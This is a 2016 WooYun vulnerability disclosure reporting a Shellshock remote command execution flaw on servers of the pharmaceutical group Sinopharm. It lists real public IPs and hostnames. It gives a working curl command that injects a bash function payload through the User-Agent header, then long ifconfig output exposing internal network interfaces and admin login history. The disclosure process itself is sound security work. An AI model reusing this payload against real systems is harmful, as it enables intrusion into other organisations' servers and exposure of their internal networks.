当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0197692

漏洞标题:国药集团某系统存在远程命令执行漏洞(可绕过边界防火墙)

相关厂商:sinopharm.com

漏洞作者: 路人甲

提交时间:2016-04-18 09:29

修复时间:2016-06-02 10:40

公开时间:2016-06-02 10:40

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-18: 细节已通知厂商并且等待厂商处理中
2016-04-18: 厂商已经确认,细节仅向厂商公开
2016-04-28: 细节向核心白帽子及相关领域专家公开
2016-05-08: 细节向普通白帽子公开
2016-05-18: 细节向实习白帽子公开
2016-06-02: 细节向公众公开

简要描述:

国药集团某系统存在远程命令执行漏洞(可绕过边界防火墙)

详细说明:

#1 存在漏洞服务器
https://124.127.98.179
https://124.127.98.173
https://124.127.98.155
https://124.127.98.158
#2 关联信息
124.127.98.165 oa.sinopharm.com
124.127.98.169 gycqdj.sinopharm.com
124.127.98.154 p.sinopharm.com
124.127.98.160 mdm.sinopharm.com

漏洞证明:

#3 利用

curl -A "() { foo;};echo;/sbin/ifconfig -a" -k https://124.127.98.178/cgi-bin/login.cgi


bond0     Link encap:Ethernet  HWaddr 00:00:00:00:00:00  
UP BROADCAST MASTER MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
bond1 Link encap:Ethernet HWaddr 00:00:00:00:00:00
UP BROADCAST MASTER MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
bond2 Link encap:Ethernet HWaddr 00:00:00:00:00:00
UP BROADCAST MASTER MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
bond3 Link encap:Ethernet HWaddr 00:00:00:00:00:00
UP BROADCAST MASTER MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
eth0 Link encap:Ethernet HWaddr 00:90:0b:31:66:6e
inet addr:10.252.252.252 Bcast:10.252.252.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:16 Memory:f7d00000-f7d20000
eth1 Link encap:Ethernet HWaddr 00:90:0b:31:66:6f
inet addr:124.127.98.170 Bcast:124.127.98.191 Mask:255.255.255.192
inet6 addr: fe80::290:bff:fe31:666f/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:34687869942 errors:0 dropped:0 overruns:0 frame:0
TX packets:32279640418 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:28462746160416 (25.8 TiB) TX bytes:19432835929497 (17.6 TiB)
Interrupt:17 Memory:f7c00000-f7c20000
eth2 Link encap:Ethernet HWaddr 00:22:46:1b:9e:a1
inet addr:114.251.127.70 Bcast:114.251.127.95 Mask:255.255.255.224
inet6 addr: fe80::222:46ff:fe1b:9ea1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:25158654337 errors:0 dropped:0 overruns:0 frame:0
TX packets:24727714352 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:19203569171172 (17.4 TiB) TX bytes:16769037255245 (15.2 TiB)
Interrupt:18 Memory:f7b00000-f7b20000
eth3 Link encap:Ethernet HWaddr 00:22:46:1b:9e:a0
inet addr:10.1.2.14 Bcast:10.1.2.15 Mask:255.255.255.248
inet6 addr: fe80::222:46ff:fe1b:9ea0/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:60799268000 errors:48 dropped:0 overruns:0 frame:48
TX packets:64451819870 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:37130061601937 (33.7 TiB) TX bytes:53318337220276 (48.4 TiB)
Interrupt:19 Memory:f7a00000-f7a20000
eth4 Link encap:Ethernet HWaddr 00:90:0b:31:66:72
inet addr:124.207.15.58 Bcast:124.207.15.63 Mask:255.255.255.248
inet6 addr: fe80::290:bff:fe31:6672/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5153627249 errors:0 dropped:0 overruns:0 frame:0
TX packets:4156259749 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5670462163558 (5.1 TiB) TX bytes:751471605046 (699.8 GiB)
Interrupt:16 Memory:f7900000-f7920000
eth5 Link encap:Ethernet HWaddr 00:90:0b:31:66:73
inet addr:11.11.11.1 Bcast:11.11.11.255 Mask:255.255.255.0
inet6 addr: fe80::290:bff:fe31:6673/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:812642742 errors:0 dropped:0 overruns:0 frame:0
TX packets:924484873 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:65001056657 (60.5 GiB) TX bytes:435437457902 (405.5 GiB)
Interrupt:17 Memory:f7800000-f7820000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:18599689 errors:0 dropped:0 overruns:0 frame:0
TX packets:18599689 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4903651601 (4.5 GiB) TX bytes:4903651601 (4.5 GiB)


admin    pts/0        172.1.23.77      Mon Mar 23 16:10 - 17:03  (00:53)    
admin pts/0 172.1.19.37 Tue Jan 20 10:15 - 12:34 (02:19)
reboot system boot 2.6.30.10 Sat Dec 6 10:26 - 09:24 (498+22:57)
reboot system boot 2.6.30.10 Sat Dec 6 09:49 - 09:24 (498+23:35)
reboot system boot 2.6.30.10 Sat Sep 27 18:59 - 09:24 (568+14:25)
reboot system boot 2.6.30.10 Thu Sep 25 21:48 - 09:24 (570+11:36)
admin pts/0 172.1.19.29 Mon Apr 28 10:02 - 10:16 (00:13)
admin pts/2 10.252.252.111 Thu Jan 16 23:46 - 00:08 (00:22)
admin pts/3 10.252.252.111 Thu Jan 16 23:18 - 00:08 (00:49)
admin pts/2 10.252.252.111 Thu Jan 16 23:15 - 23:42 (00:27)

修复方案:

# BASH更新

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-04-18 10:37

厂商回复:

我们会尽快修复。

最新状态:

暂无